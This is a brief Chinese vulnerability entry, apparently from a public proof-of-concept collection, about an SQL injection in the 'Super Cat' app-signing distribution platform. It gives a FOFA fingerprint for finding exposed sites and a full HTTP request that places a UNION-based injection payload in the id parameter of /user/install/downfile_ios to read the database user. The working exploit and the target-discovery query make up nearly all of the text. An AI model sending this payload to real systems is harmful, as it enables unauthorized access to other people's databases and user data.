27 lines
1017 B
Markdown
27 lines
1017 B
Markdown
# 超级猫签名APP分发平台前台存在SQL注入漏洞
|
||
|
||
超级猫超级签名分发平台是一个安卓苹果APP分发平台,能够对所有安卓苹果的APP进行签名分发,使所有自行开发的APP能够签名使用,包括登录注册等功能,还提供有SDK
|
||
|
||
## fofa
|
||
|
||
```java
|
||
"/themes/97013266/public/static/css/pc.css"
|
||
```
|
||
|
||
## poc
|
||
|
||
```yaml
|
||
GET /user/install/downfile_ios?id=') UNION ALL SELECT NULL,NULL,CONCAT(IFNULL(CAST(CURRENT_USER() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - HTTP/1.1
|
||
Cache-Control: no-cache
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
|
||
Host: 127.0.0.1:81
|
||
Accept: */*
|
||
Accept-Encoding: gzip, deflate
|
||
Connection: close
|
||
```
|
||
|
||
|
||
|
||
## 漏洞来源
|
||
|
||
- https://mp.weixin.qq.com/s/xTcnm_fFubFCYw4LhIXwkQ |